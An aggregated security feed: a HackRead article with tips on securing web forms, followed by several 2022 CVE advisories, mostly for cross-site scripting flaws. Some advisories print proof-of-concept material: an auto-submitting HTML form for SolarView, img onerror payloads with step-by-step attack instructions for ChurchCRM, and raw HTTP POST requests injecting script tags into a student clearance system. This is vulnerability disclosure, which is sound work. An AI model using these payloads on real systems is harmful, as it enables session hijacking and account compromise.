By Waqas
Ensuring that the forms you – or your clients – use to send and receive information via your…
This is a post from HackRead.com Read the original post: Crucial Tips for Secure Form Submissions

Ensuring that the forms you – or your clients – use to send and receive information via your website are secured are vital. Users are more aware than ever before of data security and expect the highest level of security as a standard. If your website can’t deliver on this, you’re unlikely ever to achieve the conversion rate you’d like.

Want some stats? 95% of customers have stopped buying from a company due to **data** **privacy concerns**. More than half of privacy-active users have already switched to another company to provide products and services due to their data policies. All this means, in essence, that not having every element of your site watertight is likely to cost you, customers.

So-  here are the tips and hacks you need to know to ensure you’re deploying **secure form** submissions.

**Use a High-Quality Editor**

Firstly, the basics: you need the right tools to get the job done when creating your secure form. Opt for a rich text editor that’s reliable, offers a range of stylistic functions, and can integrate with your other online security processes.

Consider an option like the **TinyMCE rich text editor**, which allows your developers complete control over the development process and boasts advanced tools and features that are accessible and easy to get started with and maintain.

**Limit User Input**

Use field validation tools whenever you create a secure form to prevent would-be hackers from identifying vulnerabilities by entering random data into form fields.

Field validation tools mean, for example, that only numbers can be entered into a field asking for a user’s telephone number.

**Ditch Detailed Error Messages**

Detailed error messages may be helpful to users, right? In most instances, this isn’t the case – but it certainly IS the case when it comes to hackers, who are likely to find a detailed message very useful indeed.

This is how: if a hacker tries to gain access and enters a username and password and gets an error message back along the lines of ‘incorrect password,’ they’ll know they’ve hit the nail on the head in terms of the username.

Make a hacker work harder; in the above scenario, a generic error message like ‘incorrect login information will give them a headache instead of an easier ride.

**Assess File Upload Security**

Look carefully at how users can upload files to check for vulnerabilities in the system. Think specifically about **how a cybercriminal** could try to use the upload facility to attack your site by uploading a file containing a virus, bug, or other malicious software.

You can take several steps to prevent this and improve security on this score. Firstly, restrict the type of file extensions allowed and limit the size of files that can be uploaded. Secondly, train staff to analyze uploaded files before opening and using them, and isolate uploaded files within your network as much as possible to limit the damage a rogue file could cause to your systems.

**Use Encryption**

**Encrypting data makes it unreadable** to those who don’t have the key – meaning that even if hackers crack it, all they’ll have will be unintelligible pieces of code. To this end, use HTTPS to provide multiple layers of protection. As well as ensuring that your customers’ browsing and online activity can’t be snooped on, HTTPS also prevents data from being modified or corrupted during transfer – without you knowing anything about it.

Finally, the authentication processes built into HTTPS ensure that all the parties exchanging data over the connection are who they claim to be.

**Consider 3DS**

To add enhanced security for form submissions relating to payments, incorporate 3DS (**3D Secure**). This technology requires customers to undertake an additional verification step with their card issuer by redirecting these customers to a dedicated authentication page on their bank’s website. Here, they’ll be asked to prove their identity by entering a unique password and a PIN or SMS code.

In some countries, using 3DS to take payments is mandatory, while in others, it’s optional. To maintain the highest level of security in your form submissions, putting it in place is recommended.

**Guard Against Cross-Site Scripting Attacks**

Cross-site scripting (**XSS**) is one of scammers’ most frequently used cyber-attacks. This type of attack involves a hacker inserting data (like a malicious script) into the content of a trusted website. This compromised content is subsequently delivered to the user’s browser.

Escaping user data in a secure form is one of the most effective ways to guard against cross-site scripting attacks. Escaping means ensuring that the data received contains no executable script before rendering it for the user.

**The Takeaway**

Use the tips and hacks above to optimize your secure form submission processes, and have peace of mind that the data of your users, and your business, is safe. When approaching the creation of secure forms, always think of the ways that hackers could try to attack and the routes they may target to identify vulnerabilities – and then plug the gaps.

Security and data privacy concerns are paramount for today’s consumers – creating the most secure forms possible is vital to strengthen your business’s position in the market.

1.  **Best Data Science Tools in 2020**
2.  **How to Create ISO Files from Discs – 3 Best Ways**
3.  **How to configure cPanel and WHM Panel on your VPS**
4.  **MySQL Performance Tuning: Top 5 Tips for Blazing Fast Queries**
5.  **How to Craft Rich Data-Driven Infographics with Powered Template**

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Crucial Tips for Secure Form Submissions

Discourse is an open-source messaging platform. In versions 2.8.10 and prior on the `stable` branch and versions 2.9.0.beta11 and prior on the `beta` and `tests-passed` branches, users composing malicious messages and navigating to drafts page could self-XSS. This vulnerability can lead to a full XSS on sites which have modified or disabled Discourseâ€™s default Content Security Policy. 
This issue is patched in the latest stable, beta and tests-passed versions of Discourse.

**Package**

Discourse (Discourse)

**Affected versions**

stable <= 2.8.10; beta <= 2.9.0.beta11; tests-passed <= 2.9.0.beta11

**Patched versions**

stable > 2.8.10; beta > 2.9.0.beta11; tests-passed > 2.9.0.beta11

**Description**

**Impact**

Users composing malicious messages and navigating to drafts page could self-XSS.

**Patches**

This issue is patched in the latest stable, beta and tests-passed versions of Discourse.

**Workarounds**

This vulnerability can lead to a full XSS on sites which have modified or disabled Discourse’s default Content Security Policy.

CVE-2022-46148: Self-XSS through malicious composer message

SolarView Compact 7.0 is vulnerable to Cross-site Scripting (XSS) via /network_test.php.

**Cross-site Scripting (XSS) in all SolarView Compact v7.00****Description**

Cross-site Scripting (XSS) - Reflected in SolarView Compact v7.0 via crafted POST request to /network\_test.php

**POC**

When someone opens this html file, or we can add it into our website, XSS will execute.

    <html>
      <body>
      <script>history.pushState('', '', '/')</script>
        <form action="http://{HOST}/network_test.php" method="POST">
          <input type="hidden" name="host" value="127&#46;0&#46;0&#46;1" />
          <input type="hidden" name="command" value="test&apos;&lt;script&gt;alert&#40;'XSS_By_Strik3r'&#41;&lt;&#47;script&gt;" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    

**Impact**

The consequence of an XSS attack is the same regardless of whether it is stored or reflected (or DOM Based). The difference is in how the payload arrives at the server. If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. Amongst other things, the attacker can:

*   Perform any action within the application that the user can perform.
*   View any information that the user is able to view.
*   Modify any information that the user is able to modify.
*   Initiate interactions with other application users, including malicious attacks, that will appear to originate from the initial victim user.

CVE-2022-44355: Vulns/SolarView Compact XSS up to 7.0.md at main · strik3r0x1/Vulns

Red Hat Security Advisory 2022-8652-01 - This release of Red Hat Fuse 7.11.1 serves as a replacement for Red Hat Fuse 7.11 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include bypass, cross site scripting, denial of service, remote SQL injection, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat Fuse 7.11.1 release and security update  
Advisory ID:       RHSA-2022:8652-01  
Product:           Red Hat JBoss Fuse  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8652  
Issue date:        2022-11-28  
CVE Names:         CVE-2019-8331 CVE-2021-3717 CVE-2021-31684  
                   CVE-2021-44906 CVE-2022-0613 CVE-2022-2048  
                   CVE-2022-2053 CVE-2022-24723 CVE-2022-24785  
                   CVE-2022-24823 CVE-2022-25857 CVE-2022-31129  
                   CVE-2022-31197 CVE-2022-33980 CVE-2022-38749  
                   CVE-2022-41853 CVE-2022-42889  
====================================================================  
1. Summary:

A minor version update (from 7.11 to 7.11.1) is now available for Red Hat  
Fuse. The purpose of this text-only errata is to inform you about the  
security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

This release of Red Hat Fuse 7.11.1 serves as a replacement for Red Hat  
Fuse 7.11 and includes bug fixes and enhancements, which are documented in  
the Release Notes document linked in the References.

Security Fix(es):

* hsqldb: Untrusted input may lead to RCE attack [fuse-7] (CVE-2022-41853)

* io.hawt-hawtio-online: bootstrap: XSS in the tooltip or popover  
data-template attribute [fuse-7] (CVE-2019-8331)

* io.hawt-project: bootstrap: XSS in the tooltip or popover data-template  
attribute [fuse-7] (CVE-2019-8331)

* wildfly: incorrect JBOSS_LOCAL_USER challenge location may lead to giving  
access to all the local users [fuse-7] (CVE-2021-3717)

* json-smart: Denial of Service in JSONParserByteArray function [fuse-7]  
(CVE-2021-31684)

* io.hawt-hawtio-integration: minimist: prototype pollution [fuse-7]  
(CVE-2021-44906)

* urijs: Authorization Bypass Through User-Controlled Key [fuse-7]  
(CVE-2022-0613)

* http2-server: Invalid HTTP/2 requests cause DoS [fuse-7] (CVE-2022-2048)

* snakeyaml: Denial of Service due to missing nested depth limitation for  
collections [fuse-7] (CVE-2022-25857)

* urijs: Leading white space bypasses protocol validation [fuse-7]  
(CVE-2022-24723)

* Moment.js: Path traversal in moment.locale [fuse-7] (CVE-2022-24785)

* netty: world readable temporary file containing sensitive data [fuse-7]  
(CVE-2022-24823)

* jdbc-postgresql: postgresql: SQL Injection in ResultSet.refreshRow() with  
malicious column names [fuse-7] (CVE-2022-31197)

* commons-configuration2: apache-commons-configuration: Apache Commons  
Configuration insecure interpolation defaults [fuse-7] (CVE-2022-33980)

* commons-text: apache-commons-text: variable interpolation RCE [fuse-7]  
(CVE-2022-42889)

* undertow: Large AJP request may cause DoS [fuse-7] (CVE-2022-2053)

* moment: inefficient parsing algorithm resulting in DoS [fuse-7]  
(CVE-2022-31129)

* snakeyaml: Uncaught exception in  
org.yaml.snakeyaml.composer.Composer.composeSequenceNode [fuse-7]  
(CVE-2022-38749)

For more details about the security issues, including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

Installation instructions are available from the Fuse 7.11.1 product  
documentation page:  
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.11/

4. Bugs fixed (https://bugzilla.redhat.com/):

1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute  
1991305 - CVE-2021-3717 wildfly: incorrect JBOSS_LOCAL_USER challenge location may lead to giving access to all the local users  
2055496 - CVE-2022-0613 urijs: Authorization Bypass Through User-Controlled Key  
2062370 - CVE-2022-24723 urijs: Leading white space bypasses protocol validation  
2066009 - CVE-2021-44906 minimist: prototype pollution  
2072009 - CVE-2022-24785 Moment.js: Path traversal  in moment.locale  
2087186 - CVE-2022-24823 netty: world readable temporary file containing sensitive data  
2095862 - CVE-2022-2053 undertow: Large AJP request may cause DoS  
2102695 - CVE-2021-31684 json-smart: Denial of Service in JSONParserByteArray function  
2105067 - CVE-2022-33980 apache-commons-configuration: Apache Commons Configuration insecure interpolation defaults  
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS  
2116952 - CVE-2022-2048 http2-server: Invalid HTTP/2 requests cause DoS  
2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections  
2129428 - CVE-2022-31197 postgresql: SQL Injection in ResultSet.refreshRow() with malicious column names  
2129706 - CVE-2022-38749 snakeyaml: Uncaught exception in org.yaml.snakeyaml.composer.Composer.composeSequenceNode  
2135435 - CVE-2022-42889 apache-commons-text: variable interpolation RCE  
2136141 - CVE-2022-41853 hsqldb: Untrusted input may lead to RCE attack

5. References:

https://access.redhat.com/security/cve/CVE-2019-8331  
https://access.redhat.com/security/cve/CVE-2021-3717  
https://access.redhat.com/security/cve/CVE-2021-31684  
https://access.redhat.com/security/cve/CVE-2021-44906  
https://access.redhat.com/security/cve/CVE-2022-0613  
https://access.redhat.com/security/cve/CVE-2022-2048  
https://access.redhat.com/security/cve/CVE-2022-2053  
https://access.redhat.com/security/cve/CVE-2022-24723  
https://access.redhat.com/security/cve/CVE-2022-24785  
https://access.redhat.com/security/cve/CVE-2022-24823  
https://access.redhat.com/security/cve/CVE-2022-25857  
https://access.redhat.com/security/cve/CVE-2022-31129  
https://access.redhat.com/security/cve/CVE-2022-31197  
https://access.redhat.com/security/cve/CVE-2022-33980  
https://access.redhat.com/security/cve/CVE-2022-38749  
https://access.redhat.com/security/cve/CVE-2022-41853  
https://access.redhat.com/security/cve/CVE-2022-42889  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4UEJdzjgjWX9erEAQg9jw//bHEzcxXGN9kNp1msJRaz6iQEu7dv9TYV  
N1lsrfJEc/fosdjIilTzia9hKhMVvbC6iv6lWGc6s3E9t48vGdSYLHbh+qHnFo7t  
WtrjZnejl53WYwRc70oyeUmXTNrrd9iuATkvkFF6MA024hcJFksuiHmF5/Awa9T8  
sSsLbm5eutvBz1rBDGgcq4fDCFB40YmKsLKhzHrV0SpeZKTCgwNyzvpAVVlsxXhk  
OSSCmda+ZTxkA9+gaTsJqqeBeDgHhSL+PVzWOYuRM6wT49tkwSJHfBs9EgV55IjE  
IVOQm3oGUyMSGBjbbiD8NuYEQkAip8AK0eTIQbaWW4n9geXpw5VOh/E3U8u+a9xY  
h0pAs6ACta+fD3d9hSabTkDDno6NU94bcmKh2rfpNvj6h9UX0Ca0lKMZ25t6zUln  
2OHzLhilUnbOSwnE709NBaEaI4t/aev1TBpeZ1KFpn/6Mdbx6pvjuh76kCHwdg7o  
OVsrvplG6hJ93S5vNNYxwfcL7TFNyWBcHR0Em7D51zZ87HkzYcNh9Ay481BgXGz+  
z2N71zc+h0auaMo5bnL68hMSjFmhiMWZmfy1H8w2Sz6fol8iO/aYI/ddv/8aYP1k  
3ZMY7ygpkvcryPaz7VKixbX7yZNOI2gfXl2zDSvIoOjaajND4ctdidxJ9MeZYj6r  
WzRyyCDzfVo=IsTh  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8652-01

The blog-post creation functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 allows injection of JavaScript code in the short_content and full_content fields, leading to XSS attacks against admin panel users via posts/preview or posts/save.

**CVE-2022-36433**

Cross-site Scripting (XSS) in blog-post creation functionality in Amasty Blog Pro for Magento 2

**Description**

The blog-post creation functionality in the Amasty Blog Pro 2.10.3 plugin for Magento 2 allows injection of JavaScript code in the short_content and full_content fields, leading to XSS attacks against admin panel users via posts/preview or posts/save.

Vulnerable endpoints which are the injection points for the parameters mentioned above:

*   POST /admin/amasty\_blog/posts/preview/key/{some\_key}/?isAjax=true
*   POST /admin/amasty\_blog/posts/save/key/{some\_key}/back/edit

**Affected versions**

< 2.10.5

**Advisory**

Update Amasty Blog Pro for Magento 2 to 2.10.5 or newer.

**References**

*   https://amasty.com/blog-pro-for-magento-2.html

CVE-2022-36433: GitHub - afine-com/CVE-2022-36433: Cross-site Scripting (XSS) in blog-post creation functionality in Amasty Blog Pro for Magento 2

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.

**Vulnerability Explanation:**

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input sHeader.

**Affected Component:**

http://ip\_address:port/churchcrm/SystemSettings.php

**Payload :**

<img src="test" onerror=confirm("Grim-The-Ripper-Team-by-SOSECURE-Thailand")>

**Tested on:**

1.  ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5
2.  Google Chrome Version 103.0.5060.114 (Official Build) (64-bit)

**Steps to attack:**

1.  Login with admin credential.

2\. Go to the “Admin” as show in the picture and Click on the “Edit General Settings”

3\. Next, Go to the “System Settings”. click on the “sHeader” input then enter the XSS payload and press the Save Settings button.

4\. After refresh this page The XSS payload will run immediately.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://churchcrm.io  
https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

CVE-2022-36137: ChurchCRM Version 4.4.5 — Stored XSS Vulnerability at sHeader

Raiden MAILD Mail Server website mail field has insufficient filtering for user input. A remote attacker with general user privilege can send email using the website with malicious JavaScript in the input field, which triggers XSS (Reflected Cross-Site Scripting) attack to the mail recipient.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202211002

CVE ID

CVE-2022-41676

CVSS

5.4 (Medium)  
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

影響產品

村榮資訊 雷電MAILD Mail Server v4.7

問題描述

雷電MAILD Mail Server網站的郵件欄位未過濾使用者輸入字串，遠端攻擊者以一般使用者權限登入後，在郵件欄位注入JavaScript語法並發送郵件，當受害者瀏覽郵件後，就會執行反射型XSS( Reflected Cross-site scripting)攻擊。

解決方法

更新版本至v4.7.4以上

漏洞通報者

Mason Yang (Acer Cyber Security Inc., ACSI)

公開日期

2022-11-29

CVE-2022-41676: 村榮資訊 雷電MAILD Mail Server -- Cross-Site Scripting

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input Deposit Comment.

**Vulnerability Explanation:**

ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input Deposit Comment.

**Affected Component:**

http://ip\_address:port/churchcrm/FindDepositSlip.php

**Payload :**

<img src="test" onerror=confirm("Grim-The-Ripper-Team-by-SOSECURE-Thailand")>

**Tested on:**

1.  ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5
2.  Google Chrome Version 103.0.5060.114 (Official Build) (64-bit)

**Steps to attack:**

1.  Login with admin credential.

2\. Go to the “Deposit” as show in the picture and Click on the “View All Deposits” then click on the “Deposit Comment” enter the XSS payload and press the “Add New Deposit” button.

3\. After press the “Add New Deposit” button The XSS payload will run immediately.

**Discoverer:**

Grim The Ripper Team by SOSECURE Thailand

**Reference:**

https://churchcrm.io  
https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

CVE-2022-36136: ChurchCRM Version 4.4.5 — Stored XSS Vulnerability at Deposit Commend

A cross-site scripting (XSS) vulnerability in Sanitization Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username parameter at /php-sms/classes/Login.php.

\> \[Suggested description\]

\> A cross-site scripting (XSS) vulnerability in Sanitization Management

\> System v1.0.0 allows attackers to execute arbitrary web scripts or HTML

\> via a crafted payload injected into the username parameter at

\> /php-sms/classes/Login.php.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Sanitization Management System - V 1.0.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> username

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Rajeshwar Singh

Use CVE-2022-45214.

CVE-2022-45214: CVE/CVE-2022-45214.txt at main · Rajeshwar40/CVE

Web-Based Student Clearance System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in /Admin/add-student.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtfullname parameter.

**1\. /changepassword.php**

txtold\_password、txtnew\_password、txtconfirm\_password

**payload:**

**txtold\_password="><script>alert(1)</script><"**

**poc:**

POST /changepassword.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/changepassword.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtold\_password="><script>alert(1)</script><"

**2\. **/Admin/changepassword.php****

txtold\_password、txtnew\_password、txtconfirm\_password

**payload:**

**txtold\_password="><script>alert(1)</script><"**

POC:

POST /admin/changepassword.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 45  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/admin/index.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtold\_password="><script>alert(1)</script><"

****3./Admin/add-admin.php****

txtusername

**payload:**

txtusername="><script>alert(1)</script><"

**poc:**

POST /Admin/add-admin.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 41  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Admin/add-admin.php  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtusername="><script>alert(1)</script><"

****4./Admin/add-student.php****

**txtfullname**

POST /Admin/add-student.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,\*/\*;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 63  
Origin: http://localhost  
Connection: close  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: none  
Sec-Fetch-User: ?1txtfullname="><script>alert(1)</script><"

Reference:

https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html

Tag

#xss